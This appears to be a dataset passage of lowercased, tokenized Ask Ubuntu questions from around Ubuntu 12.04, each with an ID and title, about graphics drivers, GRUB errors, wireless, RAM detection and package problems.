/usr/lib/x86_64-linux-gnu/dri/tls/r600_dri.so libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/r600_dri.so libgl error : failed to open drm device : permission denied libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so libgl : ca n't open configuration file /etc/drirc : no such file or directory . libgl : ca n't open configuration file /home/jason/.drirc : no such file or directory .
171778	not able to get graphs on screen with gnuplot	i have installed 12.04 along with windows 7 and also installed gnuplot 4.6.0 . when i type gnuplot on the terminal , i am getting the error message : terminal type set to unknown . when i tried plot sin ( x ) , the graph does not appear on the screen . however , i am able to make a postscript file . i tried set terminal 'x11 ' , system responds with : unknown or ambiguous terminal . please help me solve this problem .
171787	black screen until i log in	after installing 12.04 and reboot , i do not see the ubuntu logo with 5 dots , only a black screen until i login . second problem , when i shut down , then next day when i start up desktop , i do n't see any boot menu , just a black screen , and have to wait for 1 to 2 minutes until login , but sometime not smoothing , not like windows 7 . what is the problem ?
171789	set screen resolution higher than what 's supported	when i run xrandr i have this output : barsoom @ ubuntu : /etc/xdg/lxsession/lubuntu $ sudo xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 75.0* 70.0 60.0 800x600 75.0 72.0 60.0 56.0 65.0 640x480 75.0 73.0 67.0 60.0 how do i change it higher than what 's available ? i need to set it to the resolution of my monitor , 1440x900 because everything looks so big . what i tried : these command : xrandr -- addmode vga1 1440x900 xrandr : failed to get size of gamma for output default xrandr : can not find output `` vga1 ''
171796	how can i create a simple debian package from binary ?	i have been researching debian packaging , but i ca n't seem to figure out how to package a c # mono application made up of a single executable and a few resource files . can anyone help me figure out ? all the guides seem to target source packaging . also , if there is anything specific to packaging mono apps please let me know , thanks .
171798	remove services from upstart	i have mysql installed ( from repos ) on a development machine ( laptop ) and i do n't need the daemon running on every boot . i 've copied /etc/init/mysql.conf to /etc/init/mysql.conf.old and then removed everything following the `` start on '' line . however , upon reboot , i can no longer start mysqld through upstart : $ sudo service mysql start start : unknown job : mysql this also fails ( trying anything at this point ) : $ sudo service mysql restart stop : unknown job : mysql start : unknown job : mysql this is my upstart script : # /etc/init/mysql.conf ... . start on stop on starting rc runlevel= [ 016 ] this is the default script : # /etc/init/mysql.conf.old ... . start on runlevel [ 2345 ] stop on starting rc runlevel= [ 016 ] everything i 've read up until now suggests that this is how services can be prevented from starting at boot-time . is there a better way to do this or did i make a mistake in the upstart script ? update : i 've moved the backup conf file out of /etc/init and rebooted thinking that maybe there was a conflict but upstart still says unknown job : mysql
171799	not able to extract files to the icons folder	i downloaded some icons for ubuntu from a site as a tar.bz2 folder . now when bi try to extract the icons to my icons folder in the system i am getting the following message- extraction not performed you do n't have the right permissions to extract archives in the folder `` file : ///usr/share/icons '' how can i copy the icons please help me
171803	how do i know how much data has been downloaded by update-manager ?	i got a pop-up from the update-manager that there are updates available for me to download and install . i chose to install the updates . the process of downloading the updates has been running since a very long time ; downloading the updates . is there a plugin for the update manager that shows how much data has it downloaded , the downloading speed etc . i know i can calculate the difference between the size of the directory /var/cache/apt/archivers before the process begin and now , but i wish to get this on update-manager . currently i am getting something like the following : -
171807	how do i restrict user to make changes to ntfs partition ? ( in easy steps ) ?	i have 5 ntfs partition on single hard disk where ubuntu is also installed . i want to restrict particular user to have only read permission and wont make changes or delete anything on ntfs drives . even want to restrict some folder 's on ntfs parition to get access or hide from user . i can do it very well in win7 but no idea how to in ubuntu 12.04 ? also how can i grant access to ntfs partition to that user without password prompt ? yelp needed in advance configuration .
171808	is there a unified management console for ubuntu 12 ?	is there something similar to the management console in windows for example gui based device manager in windows server there is a server management console through which we can manage all system services , installed web server etc . would appreciate pointing me in the right direction
171810	ubuntu not saving files and settings when running from flash drive	how can i make ubuntu run completely off of a flash drive ? i have downloaded ubuntu onto a 4gb flash drive but no changes i make are saved between sessions . i want to be able to run and save everything i do to the flash drive . i do n't want it interfering with my hard drive at all . i just want to be able to plug my flash drive in the computer boot ubuntu , and for it to save my changes . e.g . when i install google chrome , when i reboot it is n't there .
171811	12.04 liveusb turns to black screen on test installation	i wanted to try ubuntu first before installing so i put it on a flash drive . i boot the the drive no problem but after i choose try ubuntu without installing the screen becomes a black screen with colorful lines in random places and stays there . the flash drive works in my laptop ( ati mobility radeon 5650m ) but i want this on my desktop . is this fixable or am i outta luck ?
171813	what causes the unity desktop to progressively become less stable ?	this is n't a rant about the instability of unity , so hear me out . : ) from the fresh install of 12.04 that i did , unity ran great . there were no crashes , no corruption problems , everything was great . but after a few months of 12.04 , unity tends to keep crashing when opening the dash , it gets corrupt graphics very often , and login time takes about 30 seconds longer than it did at first . my install literally has not changed from the beginning -- i have not changed any compiz settings , have not added anything new to the startup applications , etc . does anyone know how to improve unity 's stability ?
171820	graphics quality degrades when logging in	this is weird . when i 'm on the login screen the graphics quality is very good , then background is smooth . but after logging in the graphics turns bad that i can see the layer change of colors . what could be the problem ?
171822	how to overcome `` check your internet connection '' installing chromium or google chrome ?	i want to install google chrome , i.e. , chromium , on ubuntu 11.10 . i went to the software center , and then tried to install chromium . but the error shown was check your internet connection but the net was working fine .
171825	do additional language packs need to be downloaded ?	i 'm installing ubuntu ( 12.04 ) right now . i wanted to know if additional language packs have to be downloaded because my internet is very slow . i chose english as my language .
171830	wubi not downloading iso	a serious problem is occurring in installing ubuntu on windows platform . i have downloaded the `` wubi '' file from official site . but it does not download the iso image file .
171834	eclipse juno c++ error : program `` g++ '' not found in path	i installed the newest eclipse juno manually ( not through software center nor apt-get ) , and then install eclipse cdt from the help > install new software menu . however , when i try to compile a simple c++ code it show errors like program `` g++ '' not found in path . i tried g++ from terminal and it worked just fine . anyone know where the problem might be ?
171835	dell e6500 wireless not working after fresh installation of ubuntu 12.04	i had made a fresh installation of ubuntu 12.04 . after the installation , the wireless is not working . in rare of the rare case it shows sometime the wireless available with very low frequency . this happens when i keep my laptop and mode very next to it . i verified that it is working fine with windows xp ( a different laptop with me ) . kindly help me i very frustrated with this new release and is fighting for the resolution since last 1 week . below is the list of codes i had run in the terminal after google.com help . this might be helpful for resolving my issue . ================================================================ cat /etc/lsb-release ; uname -a distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04 lts '' linux chunmun 3.2.0-27-generic-pae # 43-ubuntu smp fri jul 6 15:06:05 utc 2012 i686 i686 i386 gnu/linux nprakash @ chunmun : ~ $ lspci -nnk | grep -ia2 net 00:19.0 ethernet controller [ 0200 ] : intel corporation 82567lm gigabit network connection [ 8086:10f5 ] ( rev 03 ) subsystem : dell device [ 1028:024f ] kernel driver in use : e1000e 0c:00.0 network controller [ 0280 ] : intel corporation ultimate n wifi link 5300 [ 8086:4235 ] subsystem : intel corporation device [ 8086:1121 ] kernel driver in use : iwlwifi lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 004 : id 0c45:63f0 microdia bus 003 device 006 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 005 device 002 : id 0a5c:5801 broadcom corp. bcm5880 secure applications processor with fingerprint swipe sensor bus 003 device 007 : id 413c:8157 dell computer corp . integrated keyboard bus 003 device 008 : id 413c:8158 dell computer corp . integrated touchpad / trackstick bus 003 device 009 : id 413c:8156 dell computer corp. wireless 370 bluetooth mini-card ================================================================ iwconfig lo no wireless extensions . wlan0 ieee 802.11abg essid : '' ghar '' mode : managed frequency:2.462 ghz access point : 80 : a1 : d7:7c:30:50 bit rate=1 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=29/70 signal level=-81 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:5 invalid misc:1117 missed beacon:0 eth0 no wireless extensions . rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no
171838	unity launcher libre office bug	hi all whenever i open a libre office document in 12.04 it has invisible icons in the launcher ( see screenshot ) this is really distracting and bugs the crap out of my ocd . it happens even when using the default icon set . is there a fix for this ?
171844	how to put banshee in manual sort mode	i 'm making a playlist for my friend 's birthday.i need to sort the songs .
171845	what does this warning mean in find command ?	i am trying to learn the find command , please help me with this warning : ankit @ battlestar : /home/mount_150/studies $ find -iname `` *.pdf '' -exec cp -ar { } lcommands/ \ ; cp : `./lcommands/june.pdf ' and `lcommands/june.pdf ' are the same file cp : `./lcommands/cde.pdf ' and `lcommands/cde.pdf ' are the same file cp : `./lcommands/abc.pdf ' and `lcommands/abc.pdf ' are the same file ankit @ battlestar : /home/mount_150/studies $ ls -l lcommands/ please see the screenshot of the procedure i followed , and the directory structure .
171853	how to change from unity 2d to 3d ?	i have been trying to run myunity , and it 's been working fine until today , when it comes up with the message : so , apparently i am running unity-2d . so i did a little command-line search withecho $ desktop_session and sure enough , it spat out simply `` ubuntu-2d '' . i have been using ubuntu tweak and perhaps i did something stupid in there , but i do n't think it even had a feature like that . i 've also noticed the clear differences in ubuntu 2d to ubuntu 3d , as well . i have 12.04 ubuntu . so is it possible for me to `` revert '' back to ubuntu/unity 3d ? edit : my graphic card is a 2gb dedicated amd radeon hd 7750 , which i 've come to think needs to be upgraded 12.6 version . i 'll try this and let you know the of the outcome , thanks so much for helping . result : after successfully updating the graphics card , i now can run 3d . thanks so much to all of you and i 'm sorry for such an unusual question !
171856	hp pavilion g6 at 12.04 lts - boot failure . in rescue mode boots successfully	12.04 lts amd64 fails if boot is not in rescue mode with hp pavilion g6 . at boot , grub presents 2 boot options : normal boot rescue mode if i choose rescue mode , ubuntu loads okay . if i choose normal boot , i see only a black screen with console cursor at left-top corner of screen and nothing else , any keys work . how i can fix problem ? if need technical details ( logs/configs/hardware ) please tell which exactly .
171858	how do i get a list of programs connected to internet ?	how can i get a list of programs that are currently connected to ( and are receiving data ) from the internet ? commands like iftop are good but does not show statistics based on process .
171859	is there a setting to tell deja dup when to make full backup ?	is there some settings to tell deja dup when to make full backup ? i using this just two weeks and today hit full backup again . i do backup at least once per day , but usaly 2-5 times per day . and want full backup for every two month . i wish to prefer when . is tah possible ?
171860	how can i browse wikipedia 's offline database on linux ?	i 've got wikipedia 's offline database in .xml.bz2 format . there is also a software wikitaxi to browse through it . but the problem is wikitaxi is a windows only software . is there any similar software that works on ubuntu/linux . please do n't suggest me about wine .
171866	4gb ram not detected	i 've got 4gb on my machine ( two cards of 2gb ) although the command free -m says : total : 2001 used : 1816 free : 185 i 've got 12.04 and i think pae should be installed and enabled automatically . why is that ?
171868	grub fails to install - core.img 'unusually large '	when trying to resurrect my ( t ) rusty 'ol router who 's system disk ( cf card ) had failed ( probably because i neglected to tune ubuntu properly for this type of media ) , i wanted to use the opportunity to install 12.04 server using btrfs for the entire cf card . btrfs can supposedly be better tuned towards flash disks so i figured this would be a good idea . so i swapped the defective cf card with a new one and booted from the 12.04 server cd . although the installation went painfully slow ( > 3 hrs ) , i already read this is a known issue when using btrfs on flash disks so i did not worry that much . however , when the setup process was finally at the point where grub was going to be installed , i got the following error : unable to install grub in /dev/sda executing 'grub-install /dev/sda ' failed . this is a fatal error . this is what i saw when i switched back to tty4 : grub-installer : info : installing grub on '/dev/sda' grub-installer : info : grub-install supports -- no-floppy grub-installer : info : running chroot /target grub-install -- no-floppy -- force `` /dev/sda '' grub-installer : /usr/sbin/grub-setup : warn : grub-installer : grub-installer : your core.img is unusually large . it wo n't fit in the embedding area . grub-installer : . grub-installer : /usr/sbin/grub-setup : warn : grub-installer : grub-installer : embedding is not possible . grub can only be installed in this setup by using blocklists . however blocklists are unreliable and their use is discouraged . grub-installer : . grub-installer : /usr/sbin/grub-setup : error : grub-installer : grub-installer : can not read '/ @ /boot/grub/core.img ' correctly grub-installer : . grub-installer : error : running 'grub-install -- no-floppy -- force `` /dev/sda '' ' failed . i then tried to install grub to /dev/sda1 instead , which worked without errors . however , when i now boot the system , i get the infamous 'grub error 17 ' . so my obvious question is - how do i fix this ? and is this a bug in the installer that i need to report ? as you can imagine , i would prefer not to have to spend another 3 hours doing the entire installation again ... edit : i took a quick look at the size of core.img , and it 's 38284 bytes . if i understood correctly , grub wants to put this at the very first position on the disk , where a tiny amount of space should be available before the first partition . in my case this space is , if i interpreted the data of 'fdisk -l /dev/sda ' correctly , only 63 x 512 = 32256 bytes in size ... no wonder grub complains about core.img not fitting in ! but how can it be core.img is this large ? is it because of btrfs ? for example , the core.img of my laptop is only 26052 bytes ( and it 's not using btrfs ) . how do i get it to fit , besides reformatting to something else than btrfs ? edit 2 : feeling courageous , i used gparted to move sda1 a little 'to the right ' , to enlarge the space before the first partition . after this , i booted the 12.04 server cd in resque + expert mode and tried to install grub again . this time i got a different error : grub-installer : /usr/sbin/grub-probe : error : grub-installer : grub-installer : can not find a device for /boot/grub ( is /dev mounted ? ) grub-installer : . grub-installer : error : running 'grub-install -- no-floppy -- force `` /dev/sda '' ' failed . now what ?
171871	will running ubuntu from a usb flash drive touch my hard drive ?	right now i 'm using wubi to install xubuntu 12.04 on my 8gb flash drive , and i 'd just like to make sure that when i boot from the usb it wo n't affect my hard drive 's bootloader/partitions at all , and just keep it all on the usb . is this correct ?
171876	how do i get my wna3100 ( n-300 netgear wirless adapter ) to work on ubuntu 12.04 ?	i 'm thinking about trying out ubuntu , however before doing so i want to make sure that i have a way of actually getting the internet up and running so i can properly set myself into ubuntu through help forums etc , help is greatly appreciated , thanks in advance .
171879	unable to upgrade ubuntu server as psa-imp wo n't uninstall	when i try to upgrade ubuntu using apt-get upgrade i get the message ( reading database ... 67729 files and directories currently installed . ) removing psa-imp ... where it will hang for ages before spilling out a loads of errors saying that it can not connect to database : dpkg action : trying to start service mysql ... /usr/sbin/mysqld ( pid 15949 ) is running ... done trying to establish test connection ... error 1045 ( 28000 ) : access denied for user 'admin ' @ 'localhost ' ( using password : yes ) error 1045 ( 28000 ) : access denied for user 'admin ' @ 'localhost ' ( using password : yes ) error 1045 ( 28000 ) : access denied for user 'admin ' @ 'localhost ' ( using password : yes ) error 1045 ( 28000 ) : access denied for user 'admin ' @ 'localhost ' ( using password : yes ) error 1045 ( 28000 ) : access denied for user 'admin ' @ 'localhost ' ( using password : yes ) ... . error 1045 ( 28000 ) : access denied for user 'admin ' @ 'localhost ' ( using password : yes ) error 1045 ( 28000 ) : access denied for user 'admin ' @ 'localhost ' ( using password : yes ) error 1045 ( 28000 ) : access denied for user 'admin ' @ 'localhost ' ( using password : yes ) error 1045 ( 28000 ) : access denied for user 'admin ' @ 'localhost ' ( using password : yes ) failed error while trying to establish test connection check the error reason ( see log file : /tmp/plesk_10.3.0_installation.log ) , fix and try again establish test connection ***** installing problem report ***** error while trying to establish test connection check the error reason ( see log file : /tmp/plesk_10.3.0_installation.log ) , fix and try again establish test connection dpkg : error processing psa-imp ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : psa-imp e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have read the file `` /tmp/plesk_10.3.0_installation.log '' an it does not give any clues as to why the process failed all it shows is details of the actions taken none of which fail . any help ?
171881	only 3.2gb ram ( out of 4gb ) usable on 64bit installation . dell xps 13	i bought dell xps 13 few days ago . installed 64bit version of ubuntu , and changed kernel to : 3.2.0-29-generic # 46+kamal5~dellxps-ubuntu smp sun jul 29 18:49:08 utc 2012 x86_64 x86_64 x86_64 gnu/linux my system sees only 3.2gb ( 3275mb ) of ram insted of 4gb . i have checked the stock ubuntu kernel and situation was the same . graphic card is intel hd3000 . pmd @ daftbook : ~ $ free -m total used free shared buffers cached mem : 3275 2580 695 0 321 1100 -/+ buffers/cache : 1158 2117 swap : 2047 0 2047 from lshw : *-memory description : system memory physical id : 4 slot : system board or motherboard size : 4gib *-bank:0 description : dimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : ht2scrch vendor : hynix/hyundai physical id : 0 serial : 00000000 slot : channela-dimm0 size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:1 description : dimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : ht2scrch vendor : hynix/hyundai physical id : 1 serial : 00000000 slot : channelb-dimm0 size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) /proc/meminfo - http : //pastebin.com/56ec6jj6 dmesg - http : //pastebin.com/zjr8kpjs
171884	ubuntu 12.04 lts - freezes randomly	i 've been having slowdowns/freezes in ubuntu only after upgrading to 12.04 lts . i 'm using an amd athlon ii x2 , 3gb ram and an ati radeon hd5670 . my pc freezes randomly and i suspect that it 's really the graphics card/drivers . i 've tried using the 'additional drivers ' option to install the graphics driver but it was giving me slowdowns/freezes . then i tried installing fglrx through the command line and still had freezes . i 've also tried the driver that comes from amd 's website , but still the same result.then after reading some articles , i 've tried installing the driver from ubuntu-x ( https : //launchpad.net/~ubuntu-x-swat/+archive/x-updates ) , but still freezes are random . here are the details after running fglrxinfo and glxinfo . $ glxinfo server glx vendor string : ati server glx version string : 1.4 $ fglrxinfo opengl vendor string : advanced micro devices , inc. opengl renderer string : ati radeon hd 5670 i 'm using gnome by the way , but i 've also tried out unity and at first it was running smoothly , but same result after a few hours . i 've also noticed that compiz was taking a huge amount of cpu usage . i 've also done few workarounds like setting the force full screen redraw and other stuff but did n't work . i do n't think my graphics card is broken because it 's running fine in windows . could it be that i messed up the installations and got some sort of leftovers from each ? i know that i purged fglrx cleanly after installing . is there a way to completely reset my graphics card drivers ? is anyone here also experiencing the same problems with ubuntu 12.04 lts and ati cards ? i 'm not sure what 's the next step . any help would be appreciated . thanks ! update : i apparently installed the open source driver incorrectly , and i was actually using fglrx . i installed the open source driver and am still monitoring the performance .
171885	livecd boot/install	i have recently built a new computer and have been looking to dual-boot alongside windows . trying to boot/install off ubuntu/fedora/arch live cds has failed across all distros and i keep getting the error : [ 34.5173939 ] ata9.00 : exception emask 0x52 sact 0x1 serr 0xffffffff action 0xe frozen [ 34.517403 ] ata9 : serror : { recovdata recovcomm unrecovdata persist proto hostint phyrdychg phyint commwake 10b8b dispar badcrc handshk linkseq trstatrns unrecfir devexch } [ 34.517413 ] ata9.00 : failed command : read fpdma queued [ 34.517420 ] ata9.00 : cmd 60/08:00:00:6d:70/00:00:74:00:00/40 tag 0 ncq 4096 in [ 34.517420 ] res 40/00:01:00:00:00/00:00:00:00:00/00 emask 0x56 ( ata bus error ) [ 34.517433 ] ata9.00 : status : { drdy } [ 34.667134 ] ata10.00 exception emask 0x52 sact 0x1 serr 0xffffffff action 0xe frozen [ 34.667134 ] ata10 : serror : { recovdata recovcomm unrecovdata persist proto hostint phyrdychg phyint commwake 10b8b dispar badcrc handshk linkseq trstatrns unrecfir devexch } [ 34.667153 ] ata10.00 : failed command : identify packet device [ 34.667159 ] ata10.00 : cmd a1/00:01:00:00:00/00:00:00:00:00/00 tag 0 pio 512 in [ 34.667160 ] res 40/00:01:00:00:00/00:00:00:00:00/00 emask 0x56 ( ata bus error ) [ 34.667170 ] ata10.00 : status : { drdy } i am using a new asus z77 sabertooth motherboard with a seagate barracuda st1000dm003 1tb 7200rpm hard drive . i am not entirely sure why i ca n't even boot off the live cd ? any ideas ? all distros were direct download from their respective websites , i have tried both cd boot with all distros and usb boot with arch only . i have just updated my bios as well an am still receiving the same error . the fact that it happens on cd and usb tell 's me it 's not an optical drive issue . all information i can find on this seems to relate to hard drives failing on already installed linux boxes or faulty sata cables . i am a bit confused why this issue would be preventing a cd/usb boot though . is there any more info i can provide that might help uncover the source of the problem ?
171887	can someone explain why a 8 years old hardware appear to be fast as a newer i5 notebook ?	i have a ( quite ) new acer 7750g notebbok ( intel core i5 2410m , 4 gb ddr3 1333 mhz , intel hm65 express chipset ) running ubuntu 10.04 lts . i gave to a friend of mine my older desktop pc ( asus termninator t2-ae1 , amd athlon 64 3200+ , 1.5 gb ddr 333 mhz , k8st chipset ) previously running windows xp now proudly running ubuntu 10.04 . i can not explain why that old piece of hardware run almost fast as mine . is linux that miraculous ? : - )
171892	reconfigure graphic error	i installed new kernel 3.4 from deb files but after installing when i boot my laptop with ubuntu , ubuntu ca n't boot in graphic mode and show error message for reconfigure display and graphic ! . error message : the system is running in low graphics mode 12.04 your screen , graphic card , and input device settings could not be detected correctly.you will need to configure these yourself . my graphic info is : lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati whistler xt [ amd radeon hd 6700m series ] ( rev ff ) my ubuntu version is 12.4 . how can i reconfigure display and graphic to using new kernel ?
171897	rsync password problem	i have a python script . in that , i am using rsync for data transfer between two systems . while running , it ask for password for data transfer . so that i create a password-less run by the below command . ssh-keygen -t dsa ssh-copy-id -i $ home/.ssh/id_dsa.pub root @ 192.168.0.101 now it works fine . while running my python script , the data can be transferred without asking for password . but the problem is that i create a crontab job , and run my script at every reboot , which means every time the system is on , the code will be executed automatically . in this situation , while reboot , my script starts to execute . but it asked destination system password for data transfer ( open one small dialog-box in the name of openssh ) . what to do while reboot the system is not suppose to ask password . note : if i am supposed to run my script manually , it could not ask password . the data can be transferred to destination system perfectly . if you know please teach me .i am waiting .
171898	`` e : file does not exist : file '' while removing a package	i decided to shift around my partitions on my hard drive for a fresh install of kubuntu . i booted my ubuntu 10.10 live disc , shifted everything around and attempted to install grub and it did n't work , so i burnt an ubuntu 12.04 disc and installed it . i got the computer working and wanted to install some packages , but did n't have an internet connection at the time . so ( i know this was stupid ) i got some debs from previous versions of ubuntu , as i needed my music , and the other install took a long of time to boot . once i got my internet connection back , everything worked ok , for a little while . then i stumbled upon this problem after removing ten broken packages using synaptic : drhax @ spamotard : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : libgtk2.0-cil 0 upgraded , 0 newly installed , 1 to remove and 417 not upgraded . 1 not fully installed or removed . after this operation , 2,638 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 103052 files and directories currently installed . ) removing libgtk2.0-cil ... e : file does not exist : /usr/share/cli-common/packages.d/policy.2.6.gtk-dotnet.installcligac dpkg : error processing libgtk2.0-cil ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : libgtk2.0-cil e : sub-process /usr/bin/dpkg returned an error code ( 1 ) help would be appreciated . this is my first post , but i do know fair bit about ubuntu , so feel free to point out any stupid mistakes i have made .
171902	why is n't ubuntu using the open-source amd/ati drivers ?	i 've recently installed ubuntu-x open source drivers for my ati card on ubuntu 12.04 lts . i did it with the following commands : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install fglrx and after running fglrxinfo , it returns the following : $ fglrxinfo opengl vendor string : advanced micro devices , inc. opengl renderer string : ati radeon hd 5670 my system still was n't stable so i checked the 'additional drivers ' option and found out that the amd/ati proprietary drivers are activated . does this mean i was n't using the open source drivers at all ? how can i make sure i 'm using the open source drivers ? help would be very much appreciated . thanks !
171904	12.04 ca n't connect to wired network/ crashes	i 've tried the server and desktop version of 12.04 and i get the same issues : entire system crashes while trying to install updates loses ability to connect to network ( usually after a crash ) i currently have the desktop version installed but not updated . i have no network connection . i 'd prefer to get the server version running . i 've formatted 4 times now . when ubuntu desktop crashes i get pink screen of death . when ubuntu server crashes i lose signal to the monitor . memtest86 has detected no issues with ram or cpu . i 'm suspecting either : network driver not supporting linux bad spots on the hard drive onboard vid card dying i would like to try updating the network driver first as it does not require me to purchase anything . however , i 'd have to do it offline , without another ubuntu machine . i have the correct driver downloaded on a windows 7 pc , but i do n't know how to install it to the ubuntu machine . i 'm a novice , so keryx was beyond me ( i could n't even get it running on my windows 7 machine . ) is there a way to write the network driver to a cd and have ubuntu update from the cd ?
171906	problems with unity appearence	maybe the appearance window is completely messed up . until yesterday i was n't able to change the desktop background . after trying unity -- reset , the desktop background was changeable but now themes are not changing . what can i do ?
171910	hp 510 laptop does n't suspend when i close the lid	i have an hp 510 laptop with ubuntu 12.04 . i have all the correct settings for suspending when the lid is closed , as far as i can tell , so i think it 's a problem with detecting the event . the way it `` should '' be detected , from what i can see , is a little hardware switch that is pushed when the lid closes . this switch manually puts off the backlight , and sends the suspend signal . all i can think is that the signal is n't being properly interpreted . can anyone suggest a fix ? update : i tested whether the button was actually working based on the suggestion by josinalvo , and i found that in the directory /proc/acpi/button/lid/ there is no lid directory . there is , however , a c1cf folder , and in it is a state file . when using the this file instead of lid , i discovered that , no , when i close the lid , the state does not change . the full path is : '/proc/acpi/button/lid/c1cf/state update 2 i 'm now running xubuntu 12.10 , ( unity was to slow ) but i still have the same problem .
171911	windows or ubuntu wont boot after boot-repair	pre-installed windows 7 then installed ubuntu 12.04 using live cd . ubuntu did not boot so used boot-repair to fix this problem but it did not work . now it directly boots to bios .
171914	how to connect & share your internet connection ( wired & wireless )	i have ubuntu 12.04 on a hp 430 notebook and this has a single wired internet connection and i would like to share this with a lg optimus one with android 2.3.3 . i followed these instructions and created a hotspot as shown below , but ubuntuhost is not visible on the lg optimus one when i enable the wifi on it . to summarize , i want my laptop with an internet connection to act as a wifi router and access the internet from other devices ( lg optimus one with android in this case ) . what additional steps have to be done ?
171916	wrong resolution for tv connected via hdmi ( 32lg3000 )	i have a lg electronics 32lg3000 tv . i ca n't select the right resolution for my tv connected via hdmi . i can select 1360x768 but not 1366x768 . the quality on my tv is very bad . hdmi1 connected 1360x768+1280+0 ( normal left inverted right x axis y axis ) 700mm x 390mm 1360x768 59.8*+ 1920x1080 60.0 1280x1024 60.0 1280x720 59.7 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 75.0 60.3 640x480 75.0 60.0 59.9 720x400 70.1 i have a intel 3000 graphic card and no settings menu like this there are no restricted drivers for my mac .
171923	applications to create custom distribution of ubuntu	im looking for a application that i can use to make my own distribution of ubuntu 12.04 , things i want in is latest updates , applications downloaded like : ubuntu tweak , my unity , virtualbox , vlc , docky , twitter etc . library codex for music and video nvidia drivers i tried out build-ubuntu the iso fails on the install ( something boot file missing ) and each time i tried making a distribution it keeps downloading things , i do n't have the cap or speed to keep doing this every time i want to make distribution . i tried installing novo-builder , did the install but cant find the application after the install . this will help a lot with reinstall on a pc with no internet , and for giving to friends that would like to try ubuntu without the hassle to install every time . and please do n't close the answer account of duplication i tried this build a custom ubuntu based distribution followed all the links and this did not work for me . the version of ubuntu builder used there is not the one i use , as i said , i cant download things evry time i make a distro
171925	two bugs with keyboard shortcuts : confirmation and/or solutions requested	i have 2 bugs in my ubuntu 12.04 fresh installation using a macbook pro keyboard . note : i swapped the ctrl and cmd keys ( ctrl and super on regular keyboards ) , but that should not affect the shortcuts i program . ) first i changed the switch application shortcut from alt-tab to ctrl-tab . it saves this correctly but the change does not seem to take effect . i rebooted and it still does n't . alt-tab stays working and ctrl-tab does nothing . i know ctrl-tab is used by the chromium browser , but outside the browser the shortcut is n't working either . can anyone confirm this ? i changed another shortcut in the navigation section but this change is n't working either . second in the windows section , i want to change the shortcut for close window from alt-f4 to ctrl-w ( as it is in mac and because the function keys can only be used together with the fn key ) . for some reason in some application through ubuntu 's defaults the ctrl-w shortcut is programmed for closing windows already ( although only a few ) but it seems that in the system settings it is as well . so when i click the close window item and want to enter ctrl-w as a new shortcut it closes the window . i can not set the ctrl-w hotkey anywhere since it closes the shortcuts window as i type it . can anyone using a regular keyboard confirm any of these 2 bugs ? does anyone know a solution for them ? anyone knows if these bugs are already filed ? if not i will look for them and file them myself , but i just wanted some feedback first .
171927	for minimalist systems , how important is updating regularly ?	i have a simple , stable box ( 11.04 running fluxbox ) , very rarely rebooted , used mainly for web browsing and ssh . other than frequently updating the browser ( e.g . sudo apt-get install google-chrome-stable ) , is it worth running sudo apt-get update & & sudo apt-get upgrade on a set schedule ? i 'm always afraid of destabilizing my system to protect against obscure security issues that i will likely never encounter since i use so few apps .
171933	ubuntu 12.04 - default radeon driver does not work at all	i 've recently upgraded to 12.04 lts and i have an ati radeon hd5670 . i 've heard that the open source 'radeon ' driver is used by default . however , it was n't showing anything for me . what i did was i added the 'nomodeset ' option to boot up and install fglrx . but it did n't work well for me as it introduced a lot of problems ( freezes/glitches ) . so i removed/purged fglrx and am planning to use the open source drivers instead . so my question is this : why is my default radeon driver not working ? is anyone having a similar issue ? i 've also tried using the ubuntu-x-swat driver by running the ff commands : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update but the result was the same as the radeon driver . nothing shows up on system boot . any ideas ? thanks in advance ! update running lspci -nn | grep vga gives me the following : 02:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati redwood [ radeon hd 5670 ] [ 1002:68d8 ]
171936	why are most laptop wireless and dedicated graphics drivers are proprietary ?	why are most laptop wireless or dedicated graphics drivers proprietary ? i have searched the internet for this but i have found no answers .
